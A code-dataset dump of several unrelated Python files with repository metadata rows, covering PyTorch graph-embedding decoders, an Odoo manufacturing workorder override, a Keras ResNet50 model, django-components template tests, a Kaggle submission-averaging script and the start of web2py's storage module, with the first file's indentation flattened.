class DotBilinearMetapathDecoder(nn.Module):
"""
Each edge type is represented by a matrix, and
    compositional relationships are a product of matrices.
"""
def __init__(self, relations, dims):
super(DotBilinearMetapathDecoder, self).__init__()
self.relations = relations
self.mats = {}
self.sigmoid = torch.nn.Sigmoid()
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.mats[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]], dims[rel[2]]))
#init.xavier_uniform(self.mats[rel])
init.normal(self.mats[rel], std=0.1)
self.register_parameter("_".join(rel), self.mats[rel])
def forward(self, embeds1, embeds2, rels):
act = embeds1.t()
for i_rel in rels:
act = act.mm(self.mats[i_rel])
dots = torch.sum(act * embeds2, dim=0)
return dots
class TransEMetapathDecoder(nn.Module):
"""
Decoder where the relationship score is given by translation of
    the embeddings; each relation type is represented by a vector, and
    compositional relationships are the sum of these vectors.
"""
def __init__(self, relations, dims):
super(TransEMetapathDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
self.cos = nn.CosineSimilarity(dim=0)
def forward(self, embeds1, embeds2, rels):
        trans_embed = embeds1
        for i_rel in rels:
            # avoid in-place +=: trans_embed aliases embeds1, so an in-place add
            # would silently mutate the caller's embeddings
            trans_embed = trans_embed + self.vecs[i_rel].unsqueeze(1).expand(self.vecs[i_rel].size(0), embeds1.size(1))
trans_dist = self.cos(embeds2, trans_embed)
return trans_dist
def project(self, embeds, rel):
return embeds + self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds.size(1))
class BilinearDiagMetapathDecoder(nn.Module):
"""
Decoder where the relationship score is given by a bilinear form
between the embeddings (i.e., one learned diagonal matrix per relationship type).
"""
def __init__(self, relations, dims):
super(BilinearDiagMetapathDecoder, self).__init__()
self.relations = relations
self.vecs = {}
for r1 in relations:
for r2 in relations[r1]:
rel = (r1, r2[1], r2[0])
self.vecs[rel] = nn.Parameter(torch.FloatTensor(dims[rel[0]]))
init.uniform(self.vecs[rel], a=-6.0/np.sqrt(dims[rel[0]]), b=6.0/np.sqrt(dims[rel[0]]))
self.register_parameter("_".join(rel), self.vecs[rel])
def forward(self, embeds1, embeds2, rels):
acts = embeds1
for i_rel in rels:
acts = acts*self.vecs[i_rel].unsqueeze(1).expand(self.vecs[i_rel].size(0), embeds1.size(1))
acts = (acts*embeds2).sum(0)
return acts
def project(self, embeds, rel):
return embeds*self.vecs[rel].unsqueeze(1).expand(self.vecs[rel].size(0), embeds.size(1))
"""
Set intersection operators. (Experimental)
"""
class TensorIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors
Uses a symmetric tensor operation.
"""
def __init__(self, dims):
super(TensorIntersection, self).__init__()
self.inter_tensors = {}
for mode in dims:
dim = dims[mode]
self.inter_tensors[mode] = nn.Parameter(torch.FloatTensor(dim, dim, dim))
init.xavier_uniform(self.inter_tensors[mode])
self.register_parameter(mode+"_mat", self.inter_tensors[mode])
def forward(self, embeds1, embeds2, mode):
'''
embeds1, embeds2 shape: [embed_dim, batch_size]
'''
inter_tensor = self.inter_tensors[mode]
tensor_size = inter_tensor.size()
inter_tensor = inter_tensor.view(tensor_size[0]*tensor_size[1], tensor_size[2])
temp1 = inter_tensor.mm(embeds1)
temp1 = temp1.view(tensor_size[0], tensor_size[1], embeds2.size(1))
temp2 = inter_tensor.mm(embeds2)
temp2 = temp2.view(tensor_size[0], tensor_size[1], embeds2.size(1))
result = (temp1*temp2).sum(dim=1)
return result
class SetIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors
    Applies an MLP, takes an elementwise min (or another agg_func), then another MLP.
"""
def __init__(self, mode_dims, expand_dims, use_relu = True, use_post_mat = True, agg_func=torch.min):
'''
Args:
mode_dims: the input embedding dim
expand_dims: the internal hidden state dim
'''
super(SetIntersection, self).__init__()
self.pre_mats = {}
self.use_post_mat = use_post_mat
if self.use_post_mat:
self.post_mats = {}
self.use_relu = use_relu
self.agg_func = agg_func
for mode in mode_dims:
self.pre_mats[mode] = nn.Parameter(torch.FloatTensor(expand_dims[mode], mode_dims[mode])) # [expand_embed_dim, embed_dim]
init.xavier_uniform(self.pre_mats[mode])
self.register_parameter(mode+"_premat", self.pre_mats[mode])
if self.use_post_mat:
self.post_mats[mode] = nn.Parameter(torch.FloatTensor(mode_dims[mode], expand_dims[mode]))
init.xavier_uniform(self.post_mats[mode])
self.register_parameter(mode+"_postmat", self.post_mats[mode])
# def forward(self, embeds1, embeds2, mode, embeds3 = []):
# '''
# Args:
# embeds1, embeds2 shape: [embed_dim, batch_size]
# embeds3: a list of [embed_dim, batch_size]
# Return:
# aggs: the computed embedding for the intersection variable, [mode_dims, batch_size]
# combined: the pre-intersect embeddings for each path, [num_query_path, expand_embed_dim, batch_size]
# '''
# # temp1, temp2 shape: [expand_embed_dim, batch_size]
# temp1_ = self.pre_mats[mode].mm(embeds1)
# temp1 = F.relu(temp1_)
# temp2_ = self.pre_mats[mode].mm(embeds2)
# temp2 = F.relu(temp2_)
# if len(embeds3) > 0:
# temp3_ = self.pre_mats[mode].mm(embeds3)
# temp3 = F.relu(temp3_)
# # concatenate sequence of tensors along a new dimension(dim=0 default)
# if not self.use_relu:
# combined_ = torch.stack([temp1_, temp2_, temp3_])
# combined = torch.stack([temp1, temp2, temp3])
# else:
# if not self.use_relu:
# combined_ = torch.stack([temp1_, temp2_])
# combined = torch.stack([temp1, temp2])
# aggs = self.agg_func(combined,dim=0)
# if type(aggs) == tuple:
# # For torch.min, the result is a tuple (min_value, index_tensor), we just get the 1st
# # For torch.mean, the result is just mean_value
# # so we need to check the result type
# aggs = aggs[0]
# if self.use_post_mat:
# aggs = self.post_mats[mode].mm(aggs)
# # aggs: [mode_dims, batch_size]
# if self.use_relu:
# return aggs, combined
# else:
# return aggs, combined_
def forward(self, mode, embeds_list):
'''
Args:
embeds_list: a list of embeds with shape [embed_dim, batch_size]
Return:
aggs: the computed embedding for the intersection variable, [mode_dims, batch_size]
combined: the pre-intersect embeddings for each path, [num_query_path, expand_embed_dim, batch_size]
'''
if len(embeds_list) < 2:
raise Exception("The intersection needs more than one embeding")
combined = []
combined_ = []
for i in range(len(embeds_list)):
embeds = embeds_list[i]
temp_ = self.pre_mats[mode].mm(embeds)
temp = F.relu(temp_)
if not self.use_relu:
combined_.append(temp_)
combined.append(temp)
if not self.use_relu:
combined_ = torch.stack(combined_)
combined = torch.stack(combined)
aggs = self.agg_func(combined,dim=0)
if type(aggs) == tuple:
# For torch.min, the result is a tuple (min_value, index_tensor), we just get the 1st
# For torch.mean, the result is just mean_value
# so we need to check the result type
aggs = aggs[0]
if self.use_post_mat:
aggs = self.post_mats[mode].mm(aggs)
# aggs: [mode_dims, batch_size]
if self.use_relu:
return aggs, combined
else:
return aggs, combined_
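# Sketch of the shapes involved (hypothetical dims): with
# SetIntersection(mode_dims={'place': 64}, expand_dims={'place': 128}),
# each input embed [64, B] is projected to [128, B] with ReLU, the stacked
# projections are aggregated with agg_func (default torch.min) over the path
# dimension, and use_post_mat maps the result back to [64, B].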
class SimpleSetIntersection(nn.Module):
"""
Decoder that computes the implicit intersection between two state vectors.
Takes a simple element-wise min.
"""
def __init__(self, agg_func=torch.min):
super(SimpleSetIntersection, self).__init__()
self.agg_func = agg_func
# def forward(self, embeds1, embeds2, mode, embeds3 = []):
# if len(embeds3) > 0:
# combined = torch.stack([embeds1, embeds2, embeds3])
# else:
# combined = torch.stack([embeds1, embeds2])
# aggs = self.agg_func(combined, dim=0)
# if type(aggs) == tuple:
# aggs = aggs[0]
# return aggs, combined
def forward(self, mode, embeds_list):
if len(embeds_list) < 2:
raise Exception("The intersection needs more than one embeding")
combined = torch.stack(embeds_list)
aggs = self.agg_func(combined, dim=0)
if type(aggs) == tuple:
aggs = aggs[0]
return aggs, combined
| 38.891089
| 133
| 0.602979
|
4a18fd9aee6a0653298bf1b3cd3b8a1f26888283
| 4,233
|
py
|
Python
|
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
force_translate/models/mrp_abstract_workorder.py
|
xpheragroup/FJAgosto21
|
aad1ba8104a6ea1dfcc39fc250897465872ea930
|
[
"MIT"
] | null | null | null |
from collections import defaultdict
from odoo import api, fields, models, _
from odoo.exceptions import UserError
from odoo.tools import float_compare, float_round, float_is_zero
# This module only changes string to force translate
# The original definition is done in mrp/models/mrp_abstract_workorder.py !
class MrpAbstractWorkorderLine(models.AbstractModel):
# Inherit class to make changes (on translate)
_inherit = "mrp.abstract.workorder.line"
# Overdefinition to remember type class
qty_done = fields.Float()
    # (these members are defined on "mrp.abstract.workorder.line")
lot_id = fields.Many2one()
# No changes here. Those members are here to remember
move_id = fields.Many2one()
    # type of fields and avoid no-member linting errors
product_id = fields.Many2one()
# Overdefinition to remember function definition
def _get_final_lots(self):
raise NotImplementedError(
'Method _get_final_lots() undefined on %s' % self)
def _get_production(self):
# Overdefinition to remember function definition
raise NotImplementedError(
'Method _get_production() undefined on %s' % self)
# Overdefinition to remember function definition
def _get_produced_lots(self):
return self.move_id in self._get_production().move_raw_ids and self._get_final_lots() and [(4, lot.id) for lot in self._get_final_lots()]
# Overdefinition to force translate to ES_CO
def _update_move_lines(self):
""" update a move line to save the workorder line data"""
self.ensure_one()
if self.lot_id:
move_lines = self.move_id.move_line_ids.filtered(
lambda ml: ml.lot_id == self.lot_id and not ml.lot_produced_ids)
else:
move_lines = self.move_id.move_line_ids.filtered(
lambda ml: not ml.lot_id and not ml.lot_produced_ids)
if self.product_id.tracking != 'none' and not self.lot_id:
if not self.lot_id.quant_ids:
if self.lot_id.name:
raise UserError(_('No hay existencias del lote ' + self.lot_id.name + '.'))
else:
raise UserError(_('No hay un lote establecido en el producto ' + self.product_id.name + '.'))
for i in self.lot_id.quant_ids:
if i.location_id == self.move_id.location_id:
if i.quantity == 0:
                        raise UserError(_('No hay existencias del lote ' + i.lot_id.name + '.'))
raise UserError(_('Por favor, ingrese un número de lote para %s.' %
self.product_id.display_name)) # The first translation is done here
if self.lot_id and self.product_id.tracking == 'serial' and self.lot_id in self.move_id.move_line_ids.filtered(lambda ml: ml.qty_done).mapped('lot_id'):
# The second translation is done here
raise UserError(
_('No puedes utilizar el mismo número de lote dos veces.'))
for ml in move_lines:
rounding = ml.product_uom_id.rounding
if float_compare(self.qty_done, 0, precision_rounding=rounding) <= 0:
break
quantity_to_process = min(
self.qty_done, ml.product_uom_qty - ml.qty_done)
self.qty_done -= quantity_to_process
new_quantity_done = (ml.qty_done + quantity_to_process)
if float_compare(new_quantity_done, ml.product_uom_qty, precision_rounding=rounding) >= 0:
ml.write({
'qty_done': new_quantity_done,
'lot_produced_ids': self._get_produced_lots(),
})
else:
new_qty_reserved = ml.product_uom_qty - new_quantity_done
default = {
'product_uom_qty': new_quantity_done,
'qty_done': new_quantity_done,
'lot_produced_ids': self._get_produced_lots(),
}
ml.copy(default=default)
ml.with_context(bypass_reservation_update=True).write({
'product_uom_qty': new_qty_reserved,
'qty_done': 0
})
| 47.033333
| 160
| 0.626034
|
4a18fe8dcc40336b560ccd20ce45bc39ad9f3dd6
| 2,190
|
py
|
Python
|
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
final_project/neural_net/net_model_resnet.py
|
jrkwon/ce491-2019
|
25e66157b03f123abcfdda294f36d47a0bc12273
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 28 2019 4:57 pm
@author: doshininad
"""
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.models import Model
from keras.layers import Dense
from keras import losses, optimizers
from config import Config
import const  # assumed project-local module providing CONFIG_YAML (used in save())
class NetModel:
def __init__(self, model_path):
self.model = None
self.x = None
self.prediction = None
model_name = model_path[model_path.rfind('/'):] # get folder name
self.name = model_name.strip('/')
self.model_path = model_path
#self.config = Config()
self._model()
self.base_model = None
def _model(self):
input_shape = (Config.config['input_image_width'],
Config.config['input_image_height'],
Config.config['input_image_depth'])
self.base_model = ResNet50(weights='imagenet', include_top=False, input_shape=input_shape)
self.x = self.base_model.output
self.x = Dense(512, activation='relu')(self.x)
self.x = Dense(256, activation='relu')(self.x)
self.x = Dense(64, activation='relu')(self.x)
self.prediction = Dense(Config.config['num_outputs'], activation='relu')(self.x)
self.model = Model(inputs=self.base_model.input, outputs=self.prediction)
for layer in self.base_model.layers[:44]:
layer.trainable = False
for layer in self.base_model.layers[44:]:
layer.trainable = True
self._compile()
def _compile(self):
self.model.compile(loss=losses.mean_squared_error, optimizer=optimizers.Adam())
def save(self):
json_string = self.model.to_json()
weight_filename = self.model_path + '_' + const.CONFIG_YAML
open(weight_filename+'.json', 'w').write(json_string)
self.model.save_weights(weight_filename+'.h5', overwrite=True)
def load(self):
from keras.models import model_from_json
self.model = model_from_json(open(self.model_path+'.json').read())
self.model.load_weights(self.model_path+'.h5')
self._compile()
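# --- Illustrative usage sketch (added; not part of the original file) ---
# Assumes Config.config defines the input_image_* keys and num_outputs used
# above; '../models/run1' is a hypothetical model path.
if __name__ == '__main__':
    net = NetModel('../models/run1')  # builds and compiles the ResNet50 model
    net.model.summary()               # inspect the architecture
    net.save()                        # writes run1_<CONFIG_YAML>.json / .h5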
| 33.692308
| 98
| 0.643836
|
4a18feb6e018958c4d785115e75d178c2c1b9ef1
| 14,968
|
py
|
Python
|
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
tests/test_context.py
|
danjac/django-components
|
bb3193cd4c66feb6636a4357c40e677b162d4f02
|
[
"MIT"
] | null | null | null |
from django.template import Context, Template
from django_components import component
from .django_test_setup import * # NOQA
from .testutils import Django111CompatibleSimpleTestCase as SimpleTestCase
class SimpleComponent(component.Component):
def context(self, variable=None):
return {"variable": variable} if variable is not None else {}
def template(self, context):
return "simple_template.html"
@staticmethod
def expected_output(variable_value):
return 'Variable: <strong>{}</strong>'.format(variable_value)
class ParentComponent(component.Component):
def context(self):
return {
"shadowing_variable": 'NOT SHADOWED'
}
def template(self, context):
return "parent_template.html"
class ParentComponentWithArgs(component.Component):
def context(self, parent_value):
return {
"inner_parent_value": parent_value
}
def template(self, context):
return "parent_with_args_template.html"
class VariableDisplay(component.Component):
def context(self, shadowing_variable=None, new_variable=None):
context = {}
if shadowing_variable is not None:
context['shadowing_variable'] = shadowing_variable
if new_variable is not None:
context['unique_variable'] = new_variable
return context
def template(self, context):
return "variable_display.html"
class IncrementerComponent(component.Component):
def context(self, value=0):
value = int(value)
if hasattr(self, 'call_count'):
self.call_count += 1
else:
self.call_count = 1
return {
"value": value + 1,
"calls": self.call_count
}
def template(self, context):
return "incrementer.html"
class OuterContextComponent(component.Component):
def context(self):
return self.outer_context
def template(self, context):
return "simple_template.html"
component.registry.register(name='parent_component', component=ParentComponent)
component.registry.register(name='parent_with_args', component=ParentComponentWithArgs)
component.registry.register(name='variable_display', component=VariableDisplay)
component.registry.register(name='incrementer', component=IncrementerComponent)
component.registry.register(name='simple_component', component=SimpleComponent)
component.registry.register(name='outer_context_component', component=OuterContextComponent)
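# Note (added): the templates referenced above live in the test app configured by
# django_test_setup; judging from the assertions below, simple_template.html
# presumably renders something like "Variable: <strong>{{ variable }}</strong>".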
class ContextTests(SimpleTestCase):
def test_nested_component_context_shadows_parent_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'parent_component' %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='parent_component' %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = slot_default_unique</h1>', rendered, rendered)
def test_nested_component_context_shadows_parent_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = slot_default_unique</h1>', rendered, rendered)
def test_nested_component_context_shadows_parent_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = shadow_from_slot</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_instances_have_unique_context_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Uniquely named variable = unique_val</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = unique_from_slot</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_unfilled_slots_and_component_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='parent_component' %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_unfilled_slots_and_component_block_tag(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}{% endcomponent_block %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = slot_default_override</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_nested_component_context_shadows_outer_context_with_filled_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_component' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='shadow_from_slot' new_variable='unique_from_slot' %}{% endslot %}"
"{% endcomponent_block %}")
rendered = template.render(Context({'shadowing_variable': 'NOT SHADOWED'}))
self.assertIn('<h1>Shadowing variable = override</h1>', rendered, rendered)
self.assertIn('<h1>Shadowing variable = shadow_from_slot</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
class ParentArgsTests(SimpleTestCase):
def test_parent_args_can_be_drawn_from_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value=parent_value %}"
"{% endcomponent_block %}")
rendered = template.render(Context({'parent_value': 'passed_in'}))
self.assertIn('<h1>Shadowing variable = passed_in</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_parent_args_available_outside_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value='passed_in' %}{%endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = passed_in</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
def test_parent_args_available_in_slots(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'parent_with_args' parent_value='passed_in' %}"
"{% slot 'content' %}{% component name='variable_display' "
"shadowing_variable='value_from_slot' new_variable=inner_parent_value %}{% endslot %}"
"{%endcomponent_block %}")
rendered = template.render(Context())
self.assertIn('<h1>Shadowing variable = value_from_slot</h1>', rendered, rendered)
self.assertIn('<h1>Uniquely named variable = passed_in</h1>', rendered, rendered)
self.assertNotIn('<h1>Shadowing variable = NOT SHADOWED</h1>', rendered, rendered)
class ContextCalledOnceTests(SimpleTestCase):
def test_one_context_call_with_simple_component(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='incrementer' %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>', rendered)
def test_one_context_call_with_simple_component_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component name='incrementer' value='2' %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=3;calls=1</p>', rendered)
def test_one_context_call_with_component_block(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>', rendered)
def test_one_context_call_with_component_block_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' value='3' %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=4;calls=1</p>', rendered)
def test_one_context_call_with_slot(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' %}{% slot 'content' %}"
"<p>slot</p>{% endslot %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=1;calls=1</p>\n<p>slot</p>', rendered)
def test_one_context_call_with_slot_and_arg(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'incrementer' value='3' %}{% slot 'content' %}"
"<p>slot</p>{% endslot %}{% endcomponent_block %}")
rendered = template.render(Context()).strip()
self.assertEqual(rendered, '<p class="incrementer">value=4;calls=1</p>\n<p>slot</p>', rendered)
class ComponentsCanAccessOuterContext(SimpleTestCase):
def test_simple_component_can_use_outer_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
class IsolatedContextTests(SimpleTestCase):
def test_simple_component_can_pass_outer_context_in_args(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' variable only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
def test_simple_component_cannot_use_outer_context(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'simple_component' only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertNotIn('outer_value', rendered, rendered)
class OuterContextPropertyTests(SimpleTestCase):
def test_outer_context_property_with_component(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component 'outer_context_component' only %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
def test_outer_context_property_with_component_block(self):
template = Template("{% load component_tags %}{% component_dependencies %}"
"{% component_block 'outer_context_component' only %}{% endcomponent_block %}")
rendered = template.render(Context({'variable': 'outer_value'})).strip()
self.assertIn('outer_value', rendered, rendered)
| 51.972222
| 119
| 0.661745
|
4a18ffa1106fb1bf2476d83c2d9fd8b253cb2255
| 1,332
|
py
|
Python
|
py/trash/921_mean_0218-1.py
|
KazukiOnodera/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 24
|
2019-03-14T05:03:16.000Z
|
2021-07-16T05:14:05.000Z
|
py/trash/921_mean_0218-1.py
|
xwc940512/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 1
|
2019-05-20T10:06:33.000Z
|
2019-05-20T10:06:33.000Z
|
py/trash/921_mean_0218-1.py
|
xwc940512/Microsoft-Malware-Prediction
|
103cbf7c4fc98ae584e1aa9d1c220bb79ddbbd80
|
[
"MIT"
] | 8
|
2019-03-14T06:28:38.000Z
|
2019-05-21T14:58:21.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 15 18:10:36 2019
@author: kazuki.onodera
"""
import numpy as np
import pandas as pd
from glob import glob
import utils
SUBMIT_FILE_PATH = '../output/0218-1.csv.gz'
COMMENT = 'nejumi + f002'
EXE_SUBMIT = True
# =============================================================================
#
# =============================================================================
files = sorted(glob('../output/0218-1*.pkl.gz'))
sub = pd.read_csv('../input/sample_submission.csv.zip')
for file in files:
sub['HasDetections'] += pd.read_pickle(file)['HasDetections']
sub['HasDetections'] /= sub['HasDetections'].max()
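# Note (added): dividing by the max rescales the summed predictions into [0, 1]
# (assuming they are nonnegative); the ranking, and hence AUC, is unchanged.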
print('corr with best')
sub_best = pd.read_csv(utils.SUB_BEST)
print('with mybest:', sub['HasDetections'].corr( sub_best['HasDetections'], method='spearman') )
sub_best['HasDetections'] = np.load(utils.SUB_nejumi)
print('with nejumi:', sub['HasDetections'].corr( sub_best['HasDetections'], method='spearman') )
# save
sub.to_csv(SUBMIT_FILE_PATH, index=False, compression='gzip')
# =============================================================================
# submission
# =============================================================================
if EXE_SUBMIT:
print('submit')
utils.submit(SUBMIT_FILE_PATH, COMMENT)
| 25.132075
| 96
| 0.535285
|
4a1900a123262453571877fe8a9ed5fb36bfd53a
| 458
|
py
|
Python
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 133
|
2016-07-22T15:16:16.000Z
|
2022-03-29T22:39:40.000Z
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 137
|
2021-01-05T11:21:04.000Z
|
2022-03-31T11:10:11.000Z
|
book/src/ch10/service/libs/web/setup.py
|
zangyuchen2008/Clean-Code-in-Python-Second-Edition
|
0be2e41f6cf7322e12ec55d76135ff398df61b4a
|
[
"MIT"
] | 41
|
2020-12-29T04:46:14.000Z
|
2022-03-20T22:36:17.000Z
|
from setuptools import find_packages, setup
with open("README.rst", "r") as longdesc:
long_description = longdesc.read()
install_requires = ["sanic>=20,<21"]
setup(
name="web",
description="Library with helpers for the web-related functionality",
long_description=long_description,
author="Dev team",
version="0.1.0",
packages=find_packages(where="src/"),
package_dir={"": "src"},
install_requires=install_requires,
)
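# Note (added): with package_dir={"": "src"} and find_packages(where="src/"),
# packages are discovered under src/ -- e.g. a hypothetical src/web/ directory
# would be installed and imported as "web".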
| 24.105263
| 73
| 0.696507
|
4a1900d53f28c261a6f05504ebe12b3b681588ed
| 7,395
|
py
|
Python
|
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | null | null | null |
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | 1
|
2021-06-01T22:32:25.000Z
|
2021-06-01T22:32:25.000Z
|
applications/app1/venv/lib/python2.7/site-packages/gluon/storage.py
|
link-money-dev/link-api-web-service
|
3da226c7115ee4267f8346620029b710b9987e74
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Provides:
- List; like list but returns None instead of IndexOutOfBounds
- Storage; like dictionary allowing also for `obj.foo` for `obj['foo']`
"""
import cPickle
import portalocker
__all__ = ['List', 'Storage', 'Settings', 'Messages',
'StorageList', 'load_storage', 'save_storage']
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
